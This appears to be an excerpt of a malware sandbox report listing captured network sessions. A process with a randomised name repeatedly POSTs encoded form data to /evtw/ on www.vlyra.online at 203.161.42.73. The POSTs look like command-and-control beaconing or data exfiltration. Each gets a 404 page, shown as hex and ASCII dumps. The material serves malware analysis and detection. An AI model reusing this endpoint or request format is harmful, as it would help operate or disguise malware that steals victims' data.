                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                  Aug 27, 2024 17:50:24.823203087 CEST1289INData Raw: 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20
                                                                                  Data Ascii: 14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000
                                                                                  Aug 27, 2024 17:50:24.823314905 CEST1289INData Raw: 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33 39 33 70 78 3b 73 74 72 6f 6b
                                                                                  Data Ascii: style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0
                                                                                  Aug 27, 2024 17:50:24.823328018 CEST1289INData Raw: 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c
                                                                                  Data Ascii: 157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.34
                                                                                  Aug 27, 2024 17:50:24.823339939 CEST1289INData Raw: 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72
                                                                                  Data Ascii: none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.2
                                                                                  Aug 27, 2024 17:50:24.823390961 CEST1289INData Raw: 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33 32 37 20 37 2e 32 39 39 36 34 2c 31 34 2e 35 34 39 38 35
                                                                                  Data Ascii: 9885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44
                                                                                  Aug 27, 2024 17:50:24.823535919 CEST1289INData Raw: 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65
                                                                                  Data Ascii: 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.
                                                                                  Aug 27, 2024 17:50:24.823661089 CEST1289INData Raw: 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30 30 39 20 31 30 2e 36 30 36 39 39 37 2c 32 2e 31 38 30 33 34 20 33 2e 37 37
                                                                                  Data Ascii: d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.23572 3.652818,
                                                                                  Aug 27, 2024 17:50:24.823683977 CEST1289INData Raw: 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                                  Data Ascii: th4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse ry="4.315
                                                                                  Aug 27, 2024 17:50:24.823698997 CEST1289INData Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30
                                                                                  Data Ascii: style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.03816
                                                                                  Aug 27, 2024 17:50:25.002897978 CEST1289INData Raw: 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d
                                                                                  Data Ascii: sform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.36949 0.20282,0.202


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  55192.168.11.2049861203.161.42.73805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:50:27.332182884 CEST1128OUTPOST /evtw/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.vlyra.online
                                                                                  Origin: http://www.vlyra.online
                                                                                  Referer: http://www.vlyra.online/evtw/
                                                                                  Content-Length: 545
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 6e 4f 6a 30 63 34 59 61 63 54 31 44 59 76 36 73 50 77 6c 65 6a 43 76 6a 6b 52 66 49 78 77 62 6f 44 34 70 59 30 64 32 42 73 46 45 6e 72 6e 4d 74 61 51 55 4e 68 44 64 53 79 36 69 67 56 37 31 6e 72 65 4c 72 76 71 42 34 62 41 44 5a 44 56 67 6c 4d 54 31 64 71 77 58 4e 6b 66 73 69 57 46 57 76 74 69 51 48 79 61 71 56 39 50 7a 79 58 6c 65 65 4b 78 49 30 70 67 73 47 30 50 77 6d 31 67 39 58 47 57 2b 55 73 6e 43 31 7a 75 61 58 6c 72 53 38 72 4c 36 4c 74 4f 48 48 66 4b 6c 4d 52 69 79 75 45 52 65 36 41 39 55 34 31 72 47 30 6d 72 71 53 33 4f 52 62 54 46 71 67 56 30 79 2f 33 74 4d 64 4e 4d 4e 6c 43 5a 4e 45 32 32 63 4b 39 71 50 69 73 62 6b 4e 73 5a 39 62 77 6e 4c 51 4a 4d 32 4c 65 4e 63 34 53 31 55 2b 42 59 7a 4d 47 4c 53 32 72 38 47 6b 75 6d 68 43 30 52 58 6c 33 54 48 32 71 42 52 47 47 50 78 6e 66 35 2f 53 65 44 7a 53 6f 49 57 4e 38 35 57 34 4f 66 49 56 75 38 6f 56 61 74 33 6f 36 47 45 73 33 4f 53 56 71 64 65 72 35 37 77 55 4b 4c 58 69 2b 4c 4d 58 4d 6a 54 63 74 75 7a 42 37 6c 35 30 6d [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=nOj0c4YacT1DYv6sPwlejCvjkRfIxwboD4pY0d2BsFEnrnMtaQUNhDdSy6igV71nreLrvqB4bADZDVglMT1dqwXNkfsiWFWvtiQHyaqV9PzyXleeKxI0pgsG0Pwm1g9XGW+UsnC1zuaXlrS8rL6LtOHHfKlMRiyuERe6A9U41rG0mrqS3ORbTFqgV0y/3tMdNMNlCZNE22cK9qPisbkNsZ9bwnLQJM2LeNc4S1U+BYzMGLS2r8GkumhC0RXl3TH2qBRGGPxnf5/SeDzSoIWN85W4OfIVu8oVat3o6GEs3OSVqder57wUKLXi+LMXMjTctuzB7l50mJXpIPXx+NoPpdKKmYnXOzBHPFoIGPj7xkimuoHzUy7Ho3tFDeepRmSPuUpbt7VbKn8Ogd6bnOa0ndxaLQqBDmfVz/kEkyniNiupr6Ev8NZDMqL+Gd14NM+me2buDTZzNccPMjcbJixQN1oMSvPMRSPf02KJ56gOjfKJYZCIuORQ0k5+vmCh7VnBePXJEMhfVWqqaCXg9t/dlJg=
                                                                                  Aug 27, 2024 17:50:27.506719112 CEST1289INHTTP/1.1 404 Not Found
                                                                                  Date: Tue, 27 Aug 2024 15:50:27 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 16052
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                  Aug 27, 2024 17:50:27.508965015 CEST1289INData Raw: 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20
                                                                                  Data Ascii: 14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000
                                                                                  Aug 27, 2024 17:50:27.509056091 CEST1289INData Raw: 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33 39 33 70 78 3b 73 74 72 6f 6b
                                                                                  Data Ascii: style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0
                                                                                  Aug 27, 2024 17:50:27.509068966 CEST1289INData Raw: 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c
                                                                                  Data Ascii: 157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.34
                                                                                  Aug 27, 2024 17:50:27.509306908 CEST1289INData Raw: 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72
                                                                                  Data Ascii: none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.2
                                                                                  Aug 27, 2024 17:50:27.509334087 CEST1289INData Raw: 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33 32 37 20 37 2e 32 39 39 36 34 2c 31 34 2e 35 34 39 38 35
                                                                                  Data Ascii: 9885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44
                                                                                  Aug 27, 2024 17:50:27.509387016 CEST1289INData Raw: 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65
                                                                                  Data Ascii: 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.
                                                                                  Aug 27, 2024 17:50:27.509433031 CEST1289INData Raw: 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30 30 39 20 31 30 2e 36 30 36 39 39 37 2c 32 2e 31 38 30 33 34 20 33 2e 37 37
                                                                                  Data Ascii: d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.23572 3.652818,
                                                                                  Aug 27, 2024 17:50:27.510519981 CEST1289INData Raw: 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                                  Data Ascii: th4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse ry="4.315
                                                                                  Aug 27, 2024 17:50:27.510658026 CEST1289INData Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30
                                                                                  Data Ascii: style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.03816
                                                                                  Aug 27, 2024 17:50:27.674124002 CEST1289INData Raw: 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d
                                                                                  Data Ascii: sform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.36949 0.20282,0.202


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  56192.168.11.2049862203.161.42.73805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:50:30.036597967 CEST2578OUTPOST /evtw/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.vlyra.online
                                                                                  Origin: http://www.vlyra.online
                                                                                  Referer: http://www.vlyra.online/evtw/
                                                                                  Content-Length: 52933
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 6e 4f 6a 30 63 34 59 61 63 54 31 44 59 76 36 73 50 77 6c 65 6a 43 76 6a 6b 52 66 49 78 77 62 6f 44 34 70 59 30 64 32 42 73 46 4d 6e 6f 56 45 74 62 77 6f 4e 67 44 64 53 74 4b 69 6c 56 37 31 75 72 65 44 76 76 71 4d 50 62 47 48 5a 41 43 73 6c 4e 67 52 64 34 67 58 4f 75 2f 74 6b 48 56 57 37 74 6a 74 4f 79 61 75 72 38 2f 48 79 57 6c 75 65 48 69 67 7a 71 77 73 41 30 50 77 36 6b 51 39 6c 47 57 71 45 73 6e 47 31 7a 6f 61 58 6a 4f 57 38 34 36 36 4c 31 75 48 47 4d 71 6c 50 4c 53 7a 63 45 52 4b 45 41 39 55 6f 31 75 6d 30 6d 6f 53 53 35 74 4a 55 53 6c 71 67 57 30 79 38 6b 34 55 5a 4e 4d 52 4c 43 59 70 45 32 78 67 4b 79 71 50 69 6d 5a 41 4f 38 70 39 64 30 6e 4c 44 66 38 4b 44 65 4e 49 47 53 77 6b 2b 41 6f 58 4d 46 63 2b 32 74 5a 71 6b 74 47 68 41 72 42 58 32 39 7a 47 70 71 42 41 74 47 4d 35 33 66 35 4c 53 64 6d 2f 53 73 74 69 4f 30 35 57 36 58 66 4a 58 34 38 6b 77 61 75 65 33 36 47 45 38 33 4c 71 56 71 4f 57 72 34 2f 6b 56 4b 62 58 6c 6e 37 4d 34 65 6a 66 57 74 75 76 5a 37 68 31 43 6d [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=nOj0c4YacT1DYv6sPwlejCvjkRfIxwboD4pY0d2BsFMnoVEtbwoNgDdStKilV71ureDvvqMPbGHZACslNgRd4gXOu/tkHVW7tjtOyaur8/HyWlueHigzqwsA0Pw6kQ9lGWqEsnG1zoaXjOW8466L1uHGMqlPLSzcERKEA9Uo1um0moSS5tJUSlqgW0y8k4UZNMRLCYpE2xgKyqPimZAO8p9d0nLDf8KDeNIGSwk+AoXMFc+2tZqktGhArBX29zGpqBAtGM53f5LSdm/SstiO05W6XfJX48kwaue36GE83LqVqOWr4/kVKbXln7M4ejfWtuvZ7h1CmKbpJvXxo+QAydKNkYmYTjABPF1pGO30yVOmvYXzWS7A4HtJI+eVAWSPuUllt7ZbLVsOx+ibifa0ldxULQqQDmj2z/8qky2/NgCpro8v7I1AJaL7Cd0wO8iIe332DSpjNt8PPisbNixTIVoLVvPWVSLD02+z57EejYWJL/rX1sRHjilSuWCuyVzGVvfqBqpDJi28QjbKhMWa+Jgw2RTwdk7+k0m//jzgiMBChTupM5EFhu2ZN3uCz4+h/bHYCg1M/7mPGS4K4gjReb47X3/b87yGAbFdoeGc2cxUOXh3fOdYB2RlU1z41UL1Vx3ND8iLiygI9GmRPgprqTVBJK9F6YSIOiraTKsth+HTkdApNXbQWYE97ZZyabIf9KXi9oC3Of/RMWwfoXQHJE6ep3wvIhwE2is1vyMbx85ZQyVkUgfUZqpV4/83D4tehYYrdwbEkSL9yMs5P9lEfI01f58rRkuN9ysBsejfXWI/UgEES0weXMW0hSCZbGSVlm9dRdb9dbGEj3Cmjk2frwGDFAhUnIgJSv2pvESWG0lnJyil3Z1bst92QQejLhnPAsWaTbEn4BALaUUHbWlMqQLBk6eo3trqGcAIlM1e576cM+3nVRh+cA52WBNad2r2J893wmMH+eVLXto/VqumPClAHla8p/XMwF+ot3fvoKm [TRUNCATED]
                                                                                  Aug 27, 2024 17:50:30.036673069 CEST10312OUTData Raw: 47 4e 69 47 61 70 75 32 6e 44 52 57 74 4d 45 79 48 48 6f 49 2f 2b 41 55 56 62 59 45 5a 58 53 57 41 69 33 70 75 75 6a 42 71 32 50 34 52 39 76 33 34 6c 36 61 42 31 69 51 35 59 59 66 58 66 4d 34 65 58 54 63 75 43 75 73 61 78 55 68 68 47 57 65 61 70
                                                                                  Data Ascii: GNiGapu2nDRWtMEyHHoI/+AUVbYEZXSWAi3puujBq2P4R9v34l6aB1iQ5YYfXfM4eXTcuCusaxUhhGWeapb/Sy1DUocXtH4ILIPvjBKYRJUmBnN91WhU9TpFcofsgQBFH8S+Ye2JP3vZawKqidNiibwxBAJKWVbO7ahFaKHkaVUrXY1Wmajb5Acch1/O0/9pc1GC/dscNLmUjUEvRegvmerZqyYDJbFNom7lKW1ECeadWwI4xlX
                                                                                  Aug 27, 2024 17:50:30.207492113 CEST2578OUTData Raw: 73 38 62 39 30 65 33 49 69 34 52 74 6f 43 59 55 7a 76 70 51 57 37 38 6e 78 49 37 73 46 7a 45 73 44 58 7a 76 74 46 45 79 76 48 48 42 31 6d 6b 33 42 58 6c 42 62 46 31 69 43 59 33 35 45 4e 79 53 39 32 61 30 42 79 4b 4c 45 73 73 42 4f 42 55 59 37 4f
                                                                                  Data Ascii: s8b90e3Ii4RtoCYUzvpQW78nxI7sFzEsDXzvtFEyvHHB1mk3BXlBbF1iCY35ENyS92a0ByKLEssBOBUY7O9pJv1ZpDeth0pNXlFn4zWZ6sNx0PGrz3FzzSrphltF2BTT6x+/fvZxQMsgiM6vtuIAnN+BUQQYD7ERVO0F6sSzscb2TkTcZnwuHOlGwuXedIN+xSMpHdSEZHKhvvnlmHpkWNr/AkaB7LEwgxHh0BIFvrg+dgAGKdb
